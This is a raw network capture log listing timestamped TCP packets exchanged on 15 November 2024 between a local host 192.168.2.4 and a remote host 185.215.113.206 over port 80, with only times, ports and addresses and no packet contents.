Nov 15, 2024 14:09:24.832773924 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.832775116 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.832775116 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.832813025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.832927942 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.833515882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.833551884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.833586931 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.833602905 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.833602905 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.833632946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.833667040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.833771944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.834357023 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.834393024 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.834427118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.834474087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.834474087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.834474087 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.834619999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.834969044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.835026026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.835061073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.835095882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.835113049 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.835113049 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.835141897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.835179090 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.835239887 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.835334063 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.835921049 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.835957050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.835989952 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.836040020 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.836040020 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.887423038 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.887504101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.887518883 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.887584925 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.887622118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.887630939 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.887630939 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.887659073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.887701035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.887736082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.887752056 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.887752056 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.887782097 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.888137102 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.888192892 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.888227940 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.888235092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.888266087 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.888312101 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.888360023 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.888360023 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.892657995 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.892729998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.892770052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.892774105 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.892812014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.892834902 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.892941952 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.893037081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.893074036 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.893109083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.893120050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.893120050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.893151999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.893187046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.893316031 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.896972895 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897011042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897044897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897092104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897098064 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.897229910 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.897614956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897653103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897670031 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.897684097 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897732973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897767067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897799969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.897803068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.897803068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.897844076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.897844076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.901962996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.901998997 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.902034044 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.902048111 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.902048111 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.902086973 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.902143002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.902143002 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.902390957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.902429104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.902463913 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.902508020 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.902508974 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.902512074 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.902546883 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.902653933 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.906524897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906573057 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906604052 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906613111 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.906657934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906692982 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906702995 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.906702995 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.906728983 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906776905 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906781912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.906783104 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.906811953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906847954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906856060 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.906883955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.906934977 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.906934977 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.906936884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.907222033 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.908027887 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.908063889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.908098936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.908118010 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.908149004 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.908185005 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.908217907 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.908267975 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.908267975 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.911485910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.911523104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.911566019 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.911591053 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.911598921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.911598921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.911628008 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.911637068 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.911665916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.911709070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.911825895 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.912775040 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.912811995 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.912847996 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.912861109 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.912862062 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.913009882 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.917207956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.917284966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.917403936 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.917403936 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.917718887 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.917790890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.917834997 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.917854071 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.917854071 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.917870998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.917906046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.917921066 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.917942047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.917967081 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.918010950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.918936014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.918973923 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.919008017 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.919025898 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.919025898 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.919054985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.919100046 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.919100046 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.922777891 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.922815084 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.922835112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.922848940 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.922898054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.922923088 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.922967911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.923018932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.923018932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.924097061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.924134970 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.924169064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.924182892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.924182892 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.924217939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.924267054 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.924268007 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.928235054 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.928272009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.928292990 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.928307056 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.928354979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.928355932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.928355932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.928410053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.970314980 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.970346928 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.970364094 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.970381975 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.970400095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.970400095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.970426083 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.970426083 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.970752954 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.970769882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.970787048 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.970803976 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.970819950 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.970820904 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.970820904 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.970839977 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.970860004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.970860004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.975198030 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975227118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975244999 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975261927 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975269079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975284100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.975286007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975344896 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.975344896 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.975727081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975744009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975759029 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975775003 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975790024 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.975817919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.975817919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.975898027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.979892969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.979909897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.979924917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.979940891 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.979957104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.979964972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.979964972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.979974985 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.980019093 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.980019093 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.980499983 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.980516911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.980532885 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.980549097 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.980562925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.980562925 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.980588913 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.980592012 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.980638027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.980638027 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.986212969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986252069 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986269951 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986288071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986294985 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.986294985 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.986306906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986325026 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986326933 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.986326933 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.986346006 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.986406088 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.986660957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986677885 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986716032 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986732006 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986747980 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.986757040 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.986757040 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.986849070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.991545916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.991580009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.991606951 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.991621971 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.991630077 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.991641998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.991658926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.991682053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.991682053 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.991698980 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.997359991 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.997384071 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:24.997411013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:24.997427940 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.023703098 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.023724079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.023757935 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.023838997 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.023996115 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.024019957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.024039030 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.024055004 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.024061918 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.024061918 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.024097919 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.024099112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.024859905 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.024878979 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.024894953 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.024912119 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.024930954 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.024930954 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.024970055 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.029088974 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.029107094 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.029123068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.029139042 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.029148102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.029155016 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.029194117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.029194117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.029932022 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.029949903 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.029964924 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.029979944 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.029989004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.030002117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.030368090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.034712076 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.034735918 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.034751892 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.034765959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.034770966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.034789085 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.034796000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.034796000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.034815073 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.034888029 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.035185099 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.035209894 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.035242081 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.035270929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.035284996 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.035290956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.035327911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:25.035353899 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:25.035397053 CET	49752	80	192.168.2.4	185.215.113.206
